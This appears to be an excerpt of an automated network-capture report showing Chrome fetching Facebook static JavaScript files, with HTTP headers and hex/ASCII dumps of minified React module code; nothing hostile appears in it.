                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923667729274923", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923667729274923"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1925INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  75192.168.2.649802157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC592OUTGET /rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: xDxvLqQnuVOQBwOPhCii3w==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 17:13:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: f4W7S3MRy25cRchjqsgwstr7UBfBOuBhC7M1tBghNNZGdYfA3xdzePMeHqENflE555gx+eQ6JMxY/L25i1Jydg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:23 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 102543
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC15860INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 73 65 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 76 61 69 6c 61 62 6c 65 48 65 69 67 68 74 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 73 65 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 43 6f 6e 74 65 78 74 53 69 7a 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("BaseContextualLayerAvailableHeightContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);__d("BaseContextualLayerContextSizeContext",["react"],(function(a,b,c,d,e
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 72 63 53 65 74 3a 75 7d 29 29 7d 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 61 2e 6e 61 6d 65 2b 22 20 5b 66 72 6f 6d 20 22 2b 66 2e 69 64 2b 22 5d 22 3b 62 3d 65 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 58 50 6c 61 74 52 65 61 63 74 54 6f 61 73 74 65 72 53 74 61 74 65 4d 61 6e 61 67 65 72 22 2c 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 2c 22 72 65 6d 6f 76 65 46 72 6f 6d 41 72 72 61 79 22 2c 22 73 65 74 54 69 6d 65 6f 75 74 22 2c 22 75 6e 72 65 63 6f 76 65 72 61 62 6c 65 56 69 6f 6c 61 74 69 6f 6e 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 76 61 72 20 62 3d 21 31
                                                                                                                                                                                                                                  Data Ascii: rcSet:u}))}a.displayName=a.name+" [from "+f.id+"]";b=e;g["default"]=b}),98);__d("XPlatReactToasterStateManager",["clearTimeout","removeFromArray","setTimeout","unrecoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";var h={};function i(a){var b=!1
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 2d 64 6f 6d 22 29 2e 68 74 6d 6c 2e 73 70 61 6e 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 61 2c 63 3c 62 2e 6c 65 6e 67 74 68 2d 31 26 26 69 2e 6a 73 78 73 28 69 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 69 2e 6a 73 78 28 64 28 22 72 65 61 63 74 2d 73 74 72 69 63 74 2d 64 6f 6d 22 29 2e 68 74 6d 6c 2e 73 70 61 6e 2c 7b 73 74 79 6c 65 3a 6a 2e 76 69 73 75 61 6c 6c 79 48 69 64 64 65 6e 2c 63 68 69 6c 64 72 65 6e 3a 22 2c 20 22 7d 29 2c 69 2e 6a 73 78 28 64 28 22 72 65 61 63 74 2d 73 74 72 69 63 74 2d 64 6f 6d 22 29 2e 68 74 6d 6c 2e 62 72 2c 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 21 30 7d 29 5d 7d 29 5d 7d 2c 63 29 7d 29 7d 29 3a 62 7d 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 61 2e 6e 61 6d 65 2b 22 20 5b 66 72 6f 6d 20 22 2b 66 2e 69
                                                                                                                                                                                                                                  Data Ascii: -dom").html.span,{children:[a,c<b.length-1&&i.jsxs(i.Fragment,{children:[i.jsx(d("react-strict-dom").html.span,{style:j.visuallyHidden,children:", "}),i.jsx(d("react-strict-dom").html.br,{"aria-hidden":!0})]})]},c)})}):b}a.displayName=a.name+" [from "+f.i
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 75 6c 6c 3f 64 3a 61 2e 63 75 72 72 65 6e 74 54 69 6d 65 73 74 61 6d 70 28 29 3b 61 2e 6d 61 72 6b 65 72 50 6f 69 6e 74 28 62 2c 22 6a 6f 69 6e 5f 72 65 73 70 6f 6e 73 65 5f 22 2b 63 2c 7b 69 6e 73 74 61 6e 63 65 4b 65 79 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 64 2c 64 61 74 61 3a 63 21 3d 6e 75 6c 6c 3f 7b 73 74 72 69 6e 67 3a 7b 5f 5f 6b 65 79 3a 63 7d 7d 3a 6e 75 6c 6c 7d 29 7d 66 2e 73 65 74 41 62 73 6f 6c 75 74 65 41 6c 69 67 6e 6d 65 6e 74 3d 61 3b 66 2e 73 65 74 4a 6f 69 6e 49 64 3d 62 3b 66 2e 6d 61 72 6b 4a 6f 69 6e 52 65 71 75 65 73 74 3d 63 3b 66 2e 6d 61 72 6b 4a 6f 69 6e 52 65 73 70 6f 6e 73 65 3d 64 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 51 75 69 63 6b 4d 61 72 6b 65 72 73 43 6f 6d 65 74 22 2c 5b 22 51 75 69 63 6b 4d 61 72 6b 65 72 73 43 6f
                                                                                                                                                                                                                                  Data Ascii: ull?d:a.currentTimestamp();a.markerPoint(b,"join_response_"+c,{instanceKey:e,timestamp:d,data:c!=null?{string:{__key:c}}:null})}f.setAbsoluteAlignment=a;f.setJoinId=b;f.markJoinRequest=c;f.markJoinResponse=d}),66);__d("QuickMarkersComet",["QuickMarkersCo
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 61 73 65 22 64 61 72 6b 22 3a 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 22 62 6c 75 65 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 31 34 22 29 3b 63 61 73 65 22 64 69 73 61 62 6c 65 64 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 34 36 22 29 3b 63 61 73 65 22 64 61 72 6b 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 33 30 22 29 3b 63 61 73 65 22 6c 69 67 68 74 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 33 30 22 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 33 30 22 29 7d 63 61 73 65 22 6c 69 67 68 74 22 3a 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 22 62 6c 75 65 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 32 32 22 29 3b 63 61 73 65 22 64 69 73 61 62 6c 65 64 22 3a 72 65 74 75 72 6e 20 68 28 22
                                                                                                                                                                                                                                  Data Ascii: ase"dark":switch(a){case"blue":return h("1876414");case"disabled":return h("1876446");case"dark":return h("1876430");case"light":return h("1876430");default:return h("1876430")}case"light":switch(a){case"blue":return h("1876422");case"disabled":return h("
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC14884INData Raw: 34 30 35 31 31 22 29 3b 63 61 73 65 22 6c 69 67 68 74 22 3a 72 65 74 75 72 6e 20 68 28 22 31 39 34 30 35 31 30 22 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 68 28 22 31 39 34 30 35 31 31 22 29 7d 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 68 28 22 31 39 34 30 35 31 31 22 29 7d 63 61 73 65 22 37 32 22 3a 73 77 69 74 63 68 28 63 29 7b 63 61 73 65 22 64 61 72 6b 22 3a 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 22 62 6c 75 65 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 31 38 22 29 3b 63 61 73 65 22 64 69 73 61 62 6c 65 64 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 35 30 22 29 3b 63 61 73 65 22 64 61 72 6b 22 3a 72 65 74 75 72 6e 20 68 28 22 31 38 37 36 34 33 34 22 29 3b 63 61 73 65 22 6c 69 67 68 74 22 3a 72 65 74 75 72 6e 20 68 28 22
                                                                                                                                                                                                                                  Data Ascii: 40511");case"light":return h("1940510");default:return h("1940511")}default:return h("1940511")}case"72":switch(c){case"dark":switch(a){case"blue":return h("1876418");case"disabled":return h("1876450");case"dark":return h("1876434");case"light":return h("
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC16384INData Raw: 5b 31 5d 3b 61 3d 64 28 22 43 6f 6d 65 74 49 6e 74 65 72 61 63 74 69 6f 6e 54 72 61 63 69 6e 67 51 50 4c 43 6f 6e 66 69 67 43 6f 6e 74 65 78 74 22 29 2e 75 73 65 44 69 61 6c 6f 67 54 72 61 63 65 51 50 4c 45 76 65 6e 74 28 29 3b 76 61 72 20 69 3d 63 28 22 75 73 65 43 6f 6d 65 74 49 6e 74 65 72 61 63 74 69 6f 6e 54 72 61 63 69 6e 67 22 29 28 61 2c 22 66 6c 75 69 64 22 2c 22 49 4e 54 45 52 41 43 54 49 4f 4e 22 29 3b 61 3d 63 28 22 75 73 65 49 73 43 61 6c 6c 65 64 44 75 72 69 6e 67 52 65 6e 64 65 72 22 29 28 29 3b 61 3d 6b 28 66 75 6e 63 74 69 6f 6e 28 61 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 6a 3d 65 2e 6c 6f 61 64 54 79 70 65 2c 6b 3d 65 2e 70 72 65 6c 6f 61 64 54 72 69 67 67 65 72 2c 6c 3d 65 2e 74 72 61 63 65 50 6f 6c 69 63 79 3b 69 28 66 75 6e 63 74
                                                                                                                                                                                                                                  Data Ascii: [1];a=d("CometInteractionTracingQPLConfigContext").useDialogTraceQPLEvent();var i=c("useCometInteractionTracing")(a,"fluid","INTERACTION");a=c("useIsCalledDuringRender")();a=k(function(a,d,e,f,g){var j=e.loadType,k=e.preloadTrigger,l=e.tracePolicy;i(funct
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC4762INData Raw: 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 72 65 61 63 74 2d 78 68 70 22 2c 5b 22 52 65 61 63 74 52 65 6e 64 65 72 65 72 22 2c 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 2c 68 3d 67 7c 7c 62 28 22 72 65 61 63 74 22 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 76 61 72 20 63 3d 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 64 3d 61 2e 70 72 6f 70 73 2c 65 3d 61 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 2c 66 3d 61 2e 61 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 2c 67 3d 61 2e 63 6c 6f 62 62 65 72 53 69 62 6c 69 6e 67 73 2c 69 3d 61 2e 70 72 65 6c 6f 61 64 65 72 2c 6a 3d 61 2e 62 69 67 50 69 70 65 43 6f 6e 74 65 78 74 3b 61 3d 61
                                                                                                                                                                                                                                  Data Ascii: =a}),66);__d("react-xhp",["ReactRenderer","react"],(function(a,b,c,d,e,f){"use strict";var g,h=g||b("react");function a(a){var c=a.constructor,d=a.props,e=a.placeholderElement,f=a.acrossTransitions,g=a.clobberSiblings,i=a.preloader,j=a.bigPipeContext;a=a


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  76192.168.2.649804157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC385OUTGET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1932INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: d47OlUqeaNvCHt+edjdQkA==
                                                                                                                                                                                                                                  Expires: Mon, 29 Sep 2025 04:53:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: kJyHR9QesrtYd5C+ZzyS7KIbiw7dDBwDrgQuLu822rFXhGjndMnWAYcDzo2EORyCq/IenIvF52tsbGtEwuW+5A==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:23 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=140, ullat=0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 356545
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 3b 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 69 76 65 46 6f 63 75 73 52 65 67 69 6f 6e 55 74 69 6c 73 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 63 3d 62 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 63 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 73 65 43 68 61 6d 65 6c 65 6f 6e 54 68 65 6d 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b
                                                                                                                                                                                                                                  Data Ascii: ;/*FB_PKG_DELIM*/__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 4d 3f 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3a 6e 75 6c 6c 7d 29 3b 28 69 7c 7c 28 69 3d 63 28 22 73 75 73 70 65 6e 64 4f 72 54 68 72 6f 77 49 66 55 73 65 64 49 6e 53 53 52 22 29 29 29 28 22 42 61 73 65 50 6f 72 74 61 6c 3a 20 50 6f 72 74 61 6c 73 20 61 72 65 20 6e 6f 74 20 63 75 72 72 65 6e 74 6c 79 20 73 75 70 70 6f 72 74 65 64 20 62 79 20 74 68 65 20 73 65 72 76 65 72 20 72 65 6e 64 65 72 65 72 2e 22 29 3b 72 65 74 75 72 6e 20 65 21 3d 6e 75 6c 6c 3f 64 28 22 52 65 61 63 74 44 4f 4d 22 29 2e 63 72 65 61 74 65 50 6f 72 74 61 6c 28 6c 2e 6a 73 78 28 63 28 22 42 61 73 65 54 68 65 6d 65 50 72 6f 76 69 64 65 72 2e 72 65 61 63 74 22 29 2c 7b 63 68 69 6c 64 72 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 64 29 7b
                                                                                                                                                                                                                                  Data Ascii: M?document.createElement("div"):null});(i||(i=c("suspendOrThrowIfUsedInSSR")))("BasePortal: Portals are not currently supported by the server renderer.");return e!=null?d("ReactDOM").createPortal(l.jsx(c("BaseThemeProvider.react"),{children:function(a,d){
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC1500INData Raw: 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 72 65 74 75 72 6e 20 69 2e 6a 73 78 28 63 28 22 42 61 73 65 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 6e 63 68 6f 72 52 6f 6f 74 2e 72 65 61 63 74 22 29 2c 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 29 29 7d 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 61 2e 6e 61 6d 65 2b 22 20 5b 66 72 6f 6d 20 22 2b 66 2e 69 64 2b 22 5d 22 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 67 65 74 54 61 62 62 61 62 6c 65 4e 6f 64 65 73 22 2c 5b 5d 2c 28 66 75 6e
                                                                                                                                                                                                                                  Data Ascii: t"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){return i.jsx(c("BaseContextualLayerAnchorRoot.react"),babelHelpers["extends"]({},a))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);__d("getTabbableNodes",[],(fun
